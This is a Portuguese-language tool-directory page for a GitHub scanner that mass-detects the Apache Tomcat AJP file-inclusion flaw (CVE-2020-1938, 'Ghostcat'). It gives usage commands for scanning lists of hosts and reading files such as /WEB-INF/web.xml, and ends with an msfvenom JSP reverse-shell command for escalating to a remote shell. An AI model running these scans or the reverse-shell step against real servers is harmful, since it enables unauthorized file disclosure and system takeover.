Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CNVD-2020-10487 — CVE-2020-1938 / CNVD-2020-1048 Ferramentas de Detecção | Kitploit
Ferramentas/GitHubGitHub/doggycheng/cnvd-2020-10487
Scanners de VulnerabilidadesExploraçãoShellcodeExploração de Aplicações WebTestes de PenetraçãoDesenvolvimento de Payloads
GitHubdoggycheng/cnvd-2020-10487

CNVD-2020-10487

CVE-2020-1938 / CNVD-2020-1048 Ferramentas de Detecção

Ver Repositório
861há 6 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Descrição

A ferramenta é destinada apenas à pesquisa de segurança e à auto-inspeção interna. É proibido utilizá-la para realizar ataques ilegais; as consequências são de responsabilidade do usuário.

Ferramenta de detecção em massa da vulnerabilidade de inclusão de arquivos do Apache Tomcat (CVE-2020-1938 / CNVD-2020-1048).

Este projeto foi modificado com base no projeto de Kit4y.

Modificações no código

Quando ip.txt contém apenas 1 domínio ou IP, threadCount torna-se 1 e o programa efetivamente não é executado; foi adicionado código para verificar o número de threads.

root@kitploit:~
...
if threadCount == 1:
    threadCount = 2
for i in range(0,threadCount-1):
...
Pequenas alterações no código para compatibilidade com Python 3. Código antes da modificação:
root@kitploit:~
self.stream = self.socket.makefile("rb", bufsize=0)
root@kitploit:~
print("".join([d.data for d in data]))
Código após a modificação:
root@kitploit:~
if sys.version_info < (3, 0):
    self.stream = self.socket.makefile("rb", bufsize=0)
else:
    self.stream = self.socket.makefile("rb", buffering=None)
root@kitploit:~
if sys.version_info < (3, 0):
    print("".join([d.data for d in data]))
else:
    print(b"".join([d.data for d in data]).decode("UTF-8"))

Uso

Detecção em massa

1. Coloque os domínios/IPs a serem escaneados em ip.txt, por exemplo:

127.0.0.1
www.baidu.com


www.google.com

2. python threading-find-port-8009.py

Escaneia os domínios/IPs em ip.txt para localizar aqueles com a porta 8009 aberta e os salva no 8009.txt gerado.

3. python threading-CNVD-2020-10487-Tomcat-Ajp-lfi.py

Filtra, a partir de 8009.txt, as URLs que correspondem à vulnerabilidade e as coloca em vul.txt. Por fim, os domínios presentes em vul.txt são os domínios vulneráveis.

Detecção de site único

python CNVD-2020-10487-Tomcat-Ajp-lfi.py target.com

python CNVD-2020-10487-Tomcat-Ajp-lfi.py -f /WEB-INF/web.xml 192.168.125.128

python CNVD-2020-10487-Tomcat-Ajp-lfi.py -f /index.jsp 192.168.125.128

Travessia de diretórios e reverse shell

Por padrão, lê o ROOT em webapps; alterar "/asdf" para "/test/asdf" permite acessar o conteúdo do diretório test em webapps.

root@kitploit:~
t.perform_request('/asdf',attributes=[

Se o servidor também apresentar uma vulnerabilidade de upload de arquivos, envie o shell.txt abaixo:

root@kitploit:~
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.125.130 LPORT=4444 > shell.txt

Altere "/asdf" para "/asdf.jsp"; após iniciar o MSF, use a ferramenta PoC para obter um shell.

Outras ferramentas relacionadas

https://github.com/0nise/CVE-2020-1938
https://github.com/hypn0s/AJPy
https://github.com/00theway/Ghostcat-CNVD-2020-10487

Baixar ferramenta